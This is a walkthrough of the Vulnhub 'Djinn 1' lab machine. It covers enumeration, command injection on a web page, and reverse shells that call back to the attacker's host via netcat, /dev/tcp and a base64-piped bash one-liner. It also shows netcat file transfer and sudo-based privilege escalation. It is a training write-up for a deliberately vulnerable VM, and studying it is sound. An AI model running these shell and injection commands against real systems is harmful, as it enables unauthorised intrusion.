Djinn 1
Djinn 1 vulnhub Walkthrough
Enumeration
nmap
nmap -sC -sV -oA nmap/djinn 192.168.1.110
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 03:22 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00015s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.113
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
MAC Address: 00:0C:29:3A:97:CE (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
nmap -p- -Pn 192.168.1.110
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 04:17 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
1337/tcp open waste
7331/tcp open swx
MAC Address: 00:0C:29:3A:97:CE (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
We can see here we have 2 more ports, 1337
and 7331
.
FTP
We can see that it has anonymous login. Let's try that
ftp 192.168.1.110

Then, we can list all the directories using ls
command

We can see that there are 3 files inside. Let's use get
command to get those 3 files


We can see that the content inside these 3 files
More Discovery
We can see that there is port 1337 that we just discovered just now, let's head to the browser

Let's use netcat
to get access

Answer 1000 times and I don't think he will give us our gift so let's move on to another port, port 7331.

gobuster
Lets use gobuster to enumerate the URL since we can't find any things interesting inside the site.
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.1.110:7331/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.110:7331/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/05/22 11:05:12 Starting gobuster
===============================================================
/genie (Status: 200)
/wish (Status: 200)
===============================================================
2020/05/22 11:06:02 Finished
===============================================================
We can see that there are 2 directory that is /genie
and /wish
.

Let's navigate to /wish
page
Type id
then we will get the response from it
Reverse Shell
But when I set up a listener at my kali machine and type
nc -e /bin/bash 192.168.1.113 444
It doesn't work that way, after that we actually need to encode using base64
and use pipe command to decode it and let it execute.
But then no luck too, we need to use bash reverse shell only can work
bash -i >& /dev/tcp/192.168.1.113/4444 0>&1
We then go to this website and encode it with base64
Then, we can go to our /wish
and type this
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEzLzQ0NDQgMD4mMQ== | base64 -d | bash

We can first type this to ensure we get a proper shell
python -c 'import pty; pty.spawn("/bin/bash")'
Then we can list out the directory and cat into app.py

Then we cat cat out the credentials.

We can su
to the user nitish

Privilege Escalation
We then type sudo -l
then we got this

We can use strings
command to list out all readable strings from the genie file

We can see there is a -cmd
paramter which can be apply.
After playing around we can go to sam
user by typing
sudo -u sam genie -cmd new

We then type sudo -l

If we run sudo /root/lago it will show us this

If we enter all the choices we still can't get through the selection.

So, we can navigate to the /home/sam
directory to find out more
When we type ls -la
then it will show us hidden files

Then we can use netcat to transfer files to our machine
Our machine
nc -nlvp 9000 > abc.pyc
Target machine
nc -nv 192.168.1.113 9000 < .pyc
pyc is actually compiled file of python files. We can use uncompyle6 to decompile to see the source file of it.
uncompyle6 abc.txt
# uncompyle6 version 3.7.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41)
# [GCC 9.3.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 08:05:18
from getpass import getuser
from os import system
from random import randint
def naughtyboi():
print 'Working on it!! '
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
def readfiles():
user = getuser()
path = input('Enter the full of the file to read: ')
print 'User %s is not allowed to read %s' % (user, path)
def options():
print 'What do you want to do ?'
print '1 - Be naughty'
print '2 - Guess the number'
print '3 - Read some damn files'
print '4 - Work'
choice = int(input('Enter your choice: '))
return choice
def main(op):
if op == 1:
naughtyboi()
elif op == 2:
guessit()
elif op == 3:
readfiles()
elif op == 4:
print 'work your ass off!!'
else:
print 'Do something better with your life'
if __name__ == '__main__':
main(options())
# okay decompiling abc.pyc
We can see that if input is num
then we will able to get root!
After that type sudo -u root /root/lago
Then choose the number 2 and type num
when it prompt to let us choose 1 - 100

Got root !
We then navigate to /root
directory to get the flag

Last updated
Was this helpful?